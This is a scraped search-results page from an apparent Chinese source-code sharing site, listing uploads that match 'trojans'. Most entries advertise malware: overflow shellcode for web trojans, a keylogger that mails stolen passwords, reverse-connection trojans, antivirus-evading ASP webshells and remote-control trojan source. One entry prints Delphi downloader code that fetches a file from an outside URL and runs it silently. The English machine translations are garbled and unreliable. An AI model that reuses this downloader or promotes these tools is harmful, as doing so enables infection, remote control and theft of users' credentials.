Welcome![Sign In][Sign Up]
Location:
Search - trojans

Search list

[Shell apiDocuments

Description: IFRAME溢出利用之shellcode 网上关于可以溢出之后下载程序的shellcode不少,但基本上都是用于win2000 xp 2003等,可以用于win9x的我一时没有找到,因为要做这个网页木马,就索性自己找代码和文章看了下,用了近两天的时间终于写了个可以运行于win98、winme、win2000、winxp以及win2003 server的代码。希望对大家喜欢!算是给大家的新年礼物吧!-IFRAME using the overflow Shellcode can overflow on the Internet after the download s hellcode many, but are basically used WIN2000 xp 2003. win9x can be used to the one o'clock I did not find that to be done on the website Trojans, simply find themselves on the code and read the article, spent the past two days the time has finally wrote a run on win98. WINME, WIN2000, winxp and Win2003 server code. Hope you like right! As for your New Year gift!
Platform: | Size: 3371 | Author: 飞飞 | Hits:

[OS programmimaqieting

Description: 取对方部分键盘输入(如密码和IE中的输入)并发送到自己的免费邮箱的木马程序-from the other part of the keyboard input (such as passwords and IE input) and sent to their mailbox free of Trojans
Platform: | Size: 77427 | Author: andyyau | Hits:

[Remote Controlftmmym

Description: 插入反弹木马,不用多说大家都知道!只做研究用!-inserted rebound Trojans, we all know the answer! Do research!
Platform: | Size: 691309 | Author: 毛客 | Hits:

[Windows Developxplorer_0.2.0

Description: 基于Firefox的二次开发,好用又安全的浏览器 基本特征 1.FireFox和IE双内核支持,自由切换。兼顾安全性与可操作性。 2.强大的安全性,有效杜绝木马程序和恶意插件。 3.免安装,真正绿色环保软件。 4.强大的广告过滤能力,有效杜绝浏览过程的视觉污染,并极大提高网页打开速度。 增强特性 1.集成RSS订阅能力 2.集成网文采集管理能力 3.地址拦输入搜索,拖拽式搜索能力 4.多语言翻译能力 5.常用网址导航-Firefox-based secondary development, ease of use and safe browser 1.FireFox basic characteristics of IE and dual-core support, the free switch. Balance safety and operability. 2. Strong safety, effectively stop the Trojans and malicious plug-in. 3. Installation - free, truly green software. 4. Powerful advertising filtering capabilities, and effectively eliminate browsing the visual pollution of the process, and greatly enhance the speed of the website opened. An enhanced features. Integrated RSS subscription ability 2. Integrated network management capabilities text Acquisition 3. Address bar the importation of search, drag-and-drop search capability 4. Multi-language translation capabilities 5. Common site navigation
Platform: | Size: 8009909 | Author: 寒潇1 | Hits:

[CSharpC_troj

Description: C#编写的木马 -prepared by the C# Trojan prepared by the Trojans prepared by the C# C# Trojan prepared by the Trojans
Platform: | Size: 19895 | Author: luup222 | Hits:

[WinSock-NDISDarkmoon

Description: 国外著名的远程控制软件(木马)Darkmoon的源代码,反弹端口,进程注入.要学习写木马的值得一看-famous remote control software (Trojans) Darkmoon source code rebound ports, the process of implantation. Learning to write is worth looking at the Trojans
Platform: | Size: 3842384 | Author: 东南 | Hits:

[Multimedia programMyCaptureScreen

Description: 屏幕抓图并保存为位图,可用于木马程序中监视前端运行的界面-screen and the preservation of the bitmap can be used to monitor Trojans were running front-end interface
Platform: | Size: 28646 | Author: 张晓峰 | Hits:

[Hook apiDetection_of_the_hidden_processes

Description: Many users have got used that Windows NT Task Manager shows all processes, and many consider that i s impossible to hide a process from Task Manager. Actually, process hiding is incredibly simple. There are lots of methods available for such a purpose and there are source codes available. It still amazes me that there are only a few trojans using these methods. Literally only 1 trojan from a 1000 is hidden. I think that trojan authors are lazy, since it requires extra work to hide the process and it is always easier to use ready-made sources and copy-paste them. Therefore we should expect hidden trojan processes in a near future.-Many users have got used that Windows NT Tas k Manager shows all processes, and many consider that i s impossible to hide a process from Task Manager. Actually, hiding process is incredibly simple. There are lots of methods available for such a purpose and there are source codes available. It still amaz es me that there are only a few trojans using thes e methods. Literally only a variant is from a 1000 hidden. I think that disables authors are lazy, since it requires extra work to hide the process and it is always easier to use ready-made source s and copy-paste them. Therefore we should Expe ct hidden variant processes in a near future.
Platform: | Size: 15915 | Author: inwing | Hits:

[WinSock-NDISmuma123123

Description: 一个Delphi写的简单的反弹木马,主要更能是实现反弹-Delphi write a simple rebound Trojans, it is better to achieve major rebound
Platform: | Size: 154354 | Author: 刘日超 | Hits:

[Windows Developnopnod

Description: 这个演示很有用,特别对于做木马,这种寄生程序好诡异,好有趣-this demonstration was very useful, particularly for doing Trojans, parasitic good tricky procedures, good fun
Platform: | Size: 3248 | Author: tryan | Hits:

[Otheradmin_kl

Description: 绝对免杀的ASP木马,好东西大家一起分享!-absolutely avoid scrapping the ASP Trojans, good things to share with everyone!
Platform: | Size: 20147 | Author: Dongh | Hits:

[WinSock-NDISccqmpux_hack

Description: 这是一个简化的网络控制软件 稍加改变就可以完成一个木马 限于水平问题 现在只有字符界面的-This is a simplified network control software for a little change can be completed Trojans to a level of only the character interface
Platform: | Size: 86928 | Author: cc | Hits:

[Remote ControlRemoteCtrlClient

Description: 这是一个远程控制服务端的模拟源码,可以模拟木马及远程控制软件的运行源理,可自由修改!-This is a remote-control services to the simulation source code can simulate Trojans and remote control software operating source justifications, can the freedom to change!
Platform: | Size: 39038 | Author: lxxx8888 | Hits:

[Anti-virusasp_search

Description: 查杀ASP木马,只要放在服务器上就可以直接查了-to detect and disinfect ASP Trojans, as long as the servers can be on the Direct Access
Platform: | Size: 3868 | Author: cnledu | Hits:

[WinSock-NDISmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1436 | Author: 韩冰 | Hits:

[Develop Tools图片木马制作视频教程

Description: 图片木马制作视频教程-Photo Trojans produced video tutorial
Platform: | Size: 2062626 | Author: 唐瑞峰 | Hits:

[Othermumacontrolcode-c#实现的木马

Description: 一个用c#实现的木马程序-a c # with the Trojans
Platform: | Size: 50044 | Author: 孙泱泱 | Hits:

[ExploitTroyHorseSource

Description: 反向木马源程序,供大家研究,编译出的exe会被防火墙认为木马,编译时需要注意-reverse Trojan source for all research, compile the exe firewall that will be Trojans compile-time attention
Platform: | Size: 113092 | Author: Kevin | Hits:

[Remote Controltrojian_bingle

Description: 冰鸽反转型木马的源码,包括服务端和客户端,比传统木马的优势在于本地无需开监听端口,而且采用udp协议实现,对于aport,fport,netstat等工具根本无法看到.实现更加隐藏,本程序给出了一个主要的框架,利用多线程实现,给出了目录列表,进程管理等的代码实现,很多具体的木马功能需要自己去开发.-pigeon-ice transition Trojan source code, including services and clients, than the traditional Trojan advantage is the local eavesdropping without opening ports, but use udp protocol for aport, OK, netstat tools such as we can hardly see. To achieve a more hidden, the procedure is a major the framework, the use of multithreading, is a directory listing, process management code realized, many of the specific functional needs of the Trojans to their development.
Platform: | Size: 1415205 | Author: 陈东 | Hits:

[Exploitbackdoor

Description: 一个外国的木马哦,功能挺多的-a foreign Trojans Oh, sport the
Platform: | Size: 101497 | Author: 无天 | Hits:
« 1 23 4 5 6 7 8 9 10 ... 16 »

CodeBus www.codebus.net